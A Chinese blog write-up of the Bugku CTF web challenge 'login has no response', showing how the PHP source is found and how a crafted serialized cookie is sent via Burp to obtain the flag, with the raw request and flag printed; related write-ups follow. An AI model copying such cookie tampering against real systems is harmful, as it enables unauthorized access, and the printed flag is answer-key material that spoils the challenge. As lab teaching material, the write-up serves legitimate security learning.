bugku#点login咋没反应-writeup

最新推荐文章于 2024-11-14 17:40:35 发布
最新推荐文章于 2024-11-14 17:40:35 发布
阅读量2.8k 收藏 1
点赞数 2
分类专栏: ctf 文章标签: css css3 前端 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46202048/article/details/121980111
版权

点login咋没反应

今天简单给友友们分享一下修改数据包上传的一个题型,请食用。

  • 打开靶场
    在这里插入图片描述

  • 查看源码有admin.css
    在这里插入图片描述

  • 查看/?hint
    在这里插入图片描述

  • 发现admin.css 访问

在这里插入图片描述

  • 发现/* try ?15057 */ 访问

在这里插入图片描述

  • 分析代码
<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];

if(isset($_GET['15057'])){										//isset函数检测输入值是否为空,若为空执行elseif
    show_source(__FILE__);
}                                //isset函数检测输入值是否为空,若为空执行elseif


elseif (unserialize($cookie) === "$KEY")		
				//令cookie值反序列化后的值与ctf.bugku.com相同
{   
echo "$flag";			//输出key
								
}
else {
?>
  • 当传入的参数是空的,cookie的值反序列化后等于key,则显示flag,使用在线序列化的网站快速实现
https://www.toolnb.com/dev/runCode/243e11a40a13ca67d0f13d10dadfdd48.html
  • Cookie

在这里插入图片描述

  • 使用burp修改数据包发包
    在这里插入图片描述
GET / HTTP/1.1
Host: 114.67.175.224:11451
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
cookie:s:13:"ctf.bugku.com";
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
  • 根据返回包成功得到flag!

在这里插入图片描述

flag{fd86b33cc7871e86c33b67ff01906bcc}

【文章仅限网络安全爱好者学习参考使用,请勿用于非法途径。】
#网络安全爱好者#doyoubest

do you best
关注
专栏目录
BugKu_login反应
Kobalos的博客
09-10 594
直接访问目标地址 看到一个登录框,但是不管输入什么击登录都反应,f12查看一下源码 看到了一个admin.css,是一个超链接,击看看 看到了一个/* try ?11268 */,看起来像是要传参的,试一下,果然发现了php代码 分析一下代码 <?php error_reporting(0); $KEY='ctf.bugku.com'; include_once("flag.php"); $cookie = $_COOKIE['BUGKU']; if(isset($_GET['112.
bugku-login反应 writeup
Peithon的博客
04-28 2394
题目 flag.php bugku这道login反应的题,当时做的时候也是一路艰辛,写下writeup记录解题过程 1.访问http://120.24.86.145:8002/flagphp/ 2.提示是hint,试试get一个hint参数,得到源码 3.代码审计 $cookie = $_COOKIE['ISecer']; 若unserialize($...
BugkuWeblogin反应
Pai_Space
12-11 2146
1.解题过程: 先进入场景,一个登录界面,随便输入账号密码登录都反应 查看源代码,发现存有网页元素的超链接 css 击进入查看 进入看到了 html 网页的元素构成 可以看到最上方被注释掉的提示,尝试 ?31351,构造 get 请求 得到一页代码 分析可知如果 cookie 变量的值经过反序列化后得到的值与 KEY 中强比较一模一样就会输出 flag 将内容主要部分截取使用 php 代码写出程序得到 cookie 的值 可以从上面的代码知道调用的 co...
Bugku CTF 每日一题 login反应
彼岸花苏陌的博客
01-08 1302
login反应 1.首先出现一个登录界面 了几下反应,f12看一下 发现有一个 href="admin.css" 于是加到url后面看一下,发现有反馈 /* try ?21834 */ body { background-color: #C1DEE8; } 页面显示中其他的算正常,但是这个try有迷,不过这个?倒是提醒了我可以在URL后面加一下试试,加上去果然有反应 得到如下显示 <?php error_reporting(0); $KEY='ctf.bugku.com'; i
bugku-web-login反应
qq_75121443的博客
04-15 420
请求114.67.175.224:13051这个地址,而不是114.67.175.224:13051?,先得到字符串ctf.bugku.com的序列号参数s:13:"ctf.bugku.com";这里让在cookie中添加参数BUGKU,并使参数为字符串类型ctf.bugku.com。这里在cookie中添加参数BUGKU,并将字符串的序列号参数填入为值。访问后看到一个注释,叫尝试?在页面源码中看到一个css文件。并看到构建的表是post请求。
login反应 - Bugku CTF
m0_47470899的博客
07-30 1553
login反应,查看源代码发现admin.css文件 查看文件 作为参数传入,发现关键代码 只要cookie的BUGKU参数为KEY的序列化,即可实现输出flag;注意这里是elseif,既需要抓包更改GET传入值和cookie 抓包,改GET和cookie 得到flag ...
bugku-writeup-web-社工-初步收集
dark的博客
06-18 727
题目:社工-ch
bugku-writeup-Crypto-EN-气泡
dark的博客
06-22 672
题目:EN-气泡 01—Bubble密码加密/解密 使用在线工具http://ctf.ssleye.com/bubble.html解密,发现还解码后还是神似Bubble加密,因此尝试继续解密: 发现思路正确,可以继续解密,输出变短了,但是还是Bubble加密,需要继续解密: 经过3次解密后,得到flag。 ...
bugku-writeup-Crypto-小山丘的秘密
dark的博客
06-22 553
题目:小山丘的秘密 01—找线索 题目描述为“hill能有什么秘密?”因此考虑此题考查hill密码。flag.txt中提示A=1,而hill密码中A=0,需要调整一下排布:Z=0,A=1,B=2,C=3... hill密码解密还需要秘钥,题目中还给出一个棋盘,从上而下棋子数量依次为1 2 3 1 4 5 6,可表示为ABCADEF 02—解密 由于flag.txt中提示flag全为小写,因此调整字母表为zabcdefghijklmnopqrstuvwxy,秘钥为abczade.
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
bugku-web-login反应-个人笔记
sunquan705的博客
11-10 925
bugku-web-login反应-个人笔记
Bugku WEB login反应
qq_41696858的博客
07-24 401
这题什么,日常打开页面,看源码,有一个超链接,那就进去,有提示,尝试传参13512 那就传吧,直接得到php源码,接下来就是源码分析 也啥就是一个简单的if判断 cookie要有BUGKU字段,内容要是一个序列化的ctf.bugku.com 在线PHP序列化网址 https://www.toolnb.com/dev/runCode/243e11a40a13ca67d0f13d10dadfdd48.html burp抓包 repeater,再改一下cookie就能得到flag了 参考视频链接:https
bugku_writeup】web35 login反应
kkza的博客
01-06 884
随便输入一个账号密码,login反应 当时想一下,是不是后台设置了button不能击,所以post提交不了,所以想构造一个post?还是想太多了,并有什么作用,而且这是不切实际的 有思路 。。。 。。。 仔细看一下源码或者请求接收到的内容吧 关键在于unserialize($cookie)==="$KEY" 两边序列化既有$cookie =serialize("$KEY") 在burpsuite上repeater一下 ...
Bugku web35 login反应
weixin_44522540的博客
02-24 336
三十二、web35 login反应 查看源码,发现一个admin.css,访问 提示传参?6529,访问: 得到如下代码: <?php error_reporting(0); $KEY='ctf.bugku.com'; include_once("flag.php"); $cookie = $_COOKIE['BUGKU']; if(isset($_GET['6529'])){ show_source(__FILE__); } elseif (unserialize($cookie
bugkuLogin2
小诺言的博客
03-14 2184
1: 打开环境,是一个页面登陆界面,不能注册,破?union select绕过, (有的师傅先sqlmap,发现啥啊也有;python sqlmap.py -r sql.txt --level 5 --batch –batch //选项不询问,全部按照默认,发现有注入,然后爆它数据库--dbs,表--table,爆列名,得到id,username和password,在爆字段,发现是空的) 2:那就打开bp,火狐(这里推荐)就不用去设置进行设置代理了 3:先在登录界面随便输入一些东西,
bugku ctf flag.php (login反应)
qq_42777804的博客
08-03 856
打开之后 提示 hint那么访问他 是源码 <?php error_reporting(0); include_once("flag.php"); $cookie = $_COOKIE['ISecer']; if(isset($_GET['hint'])){ show_source(__FILE__); } elseif (unserialize($...
BugKu--login3(SKCTF)
weixin_43803070的博客
07-10 466
看到一个登陆框 ,首先用admin+万能密码登陆,发现提示密码错误证明用户名是正确的。所以我们开始注入: 首先我们输入admin’: 输入admin‘#,提示密码错误,输入admin’ #,提示非法字符,一看就是过滤了空格,我们单独输入and、union、select、for、from,发现过滤了and、union、for字符。 接着我们就需要绕过过滤字符: 括号绕过空格: 如果空格被过滤,括...
CSS回顾-长度单位汇总详解
最新发布
懒羊羊我小弟的博客
11-14 874
本文详细介绍了 CSS 中的长度单位。包括绝对长度单位(px、cm、mm、in、pt、pc)和相对长度单位(em、rem、%、vw、vh、vmin、vmax)。阐述了它们的定义、应用场景、优缺,并对比了绝对长度单位与相对长度单位,指出绝对长度单位有固定参照,相对长度单位基于其他元素属性计算,在响应式设计中各有特
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值